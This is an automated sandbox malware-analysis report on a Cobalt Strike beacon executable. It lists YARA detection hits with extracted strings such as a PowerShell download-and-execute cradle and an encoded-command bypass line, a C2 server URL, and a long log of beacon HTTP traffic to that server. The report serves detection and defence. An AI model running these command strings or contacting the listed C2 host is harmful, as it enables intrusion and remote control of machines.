0.2.7xRIr23y7v.exe.17dea720000.1.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x2db01:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x2d8d1:$x2: %d is an x86 process (can't inject x64 content) 0x2dab7:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2db9b:$x4: Failed to impersonate token from %d (%u) 0x2dbf2:$x5: Failed to impersonate logged on user %d (%u) 0x2cfa3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
0.2.7xRIr23y7v.exe.17dea720000.1.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen
0.2.7xRIr23y7v.exe.17dea720000.1.unpack	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x2da8f:$s1: %%IMPORT%% 0x2cf87:$s2: www6.%x%x.%s 0x2cf7b:$s3: cdn.%x%x.%s 0x2d203:$s4: api.%x%x.%s 0x2df70:$s5: %s (admin) 0x2d272:$s6: could not spawn %s: %d 0x2db33:$s7: Could not kill %d: %d 0x2d34c:$s8: Could not connect to pipe (%s): %d 0x2cf94:$s9: %s.1%x.%x%x.%s 0x2cfa3:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2d01b:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2d07e:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2d0c4:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2d102:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x2d138:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2d161:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2d186:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x2d1a7:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x2d1c4:$s9: %s.1%08x%08x%08x.%x%x.%s 0x2d1dd:$s9: %s.1%08x%08x.%x%x.%s 0x2d1f2:$s9: %s.1%08x.%x%x.%s
0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x2e9a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2ea1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f185:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x2f4b7:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2f449:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2f4b7:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2ea7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2ec0f:$a7: could not run command (w/ token) because of its length of %d bytes! 0x2eac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2eb02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x2f501:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x2ed6f:$a11: Could not open service control manager on %s: %d 0x2f2a1:$a12: %d is an x64 process (can't inject x86 content) 0x2f2d1:$a13: %d is an x86 process (can't inject x64 content) 0x2f5f2:$a14: Failed to impersonate logged on user %d (%u) 0x2f25a:$a15: could not create remote thread in %d: %d 0x2eb38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f208:$a17: could not write to process memory: %d 0x2eda0:$a18: Could not create service %s on %s: %d 0x2ee29:$a19: Could not delete service %s on %s: %d 0x2ec89:$a20: Could not open process token: %d (%u)
0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1a1f8:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x17ad2:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x18d83:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x2f4b7:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2f501:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x2f2d1:$x3: %d is an x86 process (can't inject x64 content) 0x2ec89:$s1: Could not open process token: %d (%u) 0x2e9a3:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2ed4c:$s4: Could not connect to pipe (%s): %d
0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x3da21:$loader_export: ReflectiveLoader 0x2e960:$exportname: beacon.dll
0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x2f2a1:$x2: %d is an x64 process (can't inject x86 content) 0x2f5f2:$x3: Failed to impersonate logged on user %d (%u) 0x2f501:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x2f4b7:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2ec0f:$s3: could not run command (w/ token) because of its length of %d bytes! 0x2f208:$s4: could not write to process memory: %d 0x2e9a3:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2ed4c:$s6: Could not connect to pipe (%s): %d
0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x2f970:$str1: %s (admin) 0x2e960:$str2: beacon.dll
0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x2f501:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x2f2d1:$x2: %d is an x86 process (can't inject x64 content) 0x2f4b7:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2f59b:$x4: Failed to impersonate token from %d (%u) 0x2f5f2:$x5: Failed to impersonate logged on user %d (%u) 0x2e9a3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x2f48f:$s1: %%IMPORT%% 0x2e987:$s2: www6.%x%x.%s 0x2e97b:$s3: cdn.%x%x.%s 0x2ec03:$s4: api.%x%x.%s 0x2f970:$s5: %s (admin) 0x2ec72:$s6: could not spawn %s: %d 0x2f533:$s7: Could not kill %d: %d 0x2ed4c:$s8: Could not connect to pipe (%s): %d 0x2e994:$s9: %s.1%x.%x%x.%s 0x2e9a3:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2ea1b:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2ea7e:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2eac4:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2eb02:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x2eb38:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2eb61:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2eb86:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x2eba7:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x2ebc4:$s9: %s.1%08x%08x%08x.%x%x.%s 0x2ebdd:$s9: %s.1%08x%08x.%x%x.%s 0x2ebf2:$s9: %s.1%08x.%x%x.%s
Click to see the 18 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 7xRIr23y7v.exe

Avira: detected

Found malware configuration

Source: 00000000.00000002.2893026267.0000017DE2BE0000.00000040.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: CobaltStrike {"C2Server": "http://139.196.73.80:9902/WNwA", "User Agent": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\r\n"}

Multi AV Scanner detection for submitted file

Source: 7xRIr23y7v.exe	ReversingLabs: Detection: 52%
Source: 7xRIr23y7v.exe	Virustotal: Detection: 52%			Perma Link

Machine Learning detection for sample

Source: 7xRIr23y7v.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA721184 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,		0_2_0000017DEA721184
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA74E020 CryptGenRandom,		0_2_0000017DEA74E020

Source: 7xRIr23y7v.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA730ED4 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,		0_2_0000017DEA730ED4
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA73779C malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,		0_2_0000017DEA73779C

Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 4x nop then mov rdi, 0000800000000000h		0_2_008052E0
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 4x nop then mov rsi, r9		0_2_008067A0

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://139.196.73.80:9902/WNwA

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49836

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 139.196.73.80:9902

Source: Joe Sandbox View

ASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd

Source: global traffic	HTTP traffic detected: GET /WNwA HTTP/1.1User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
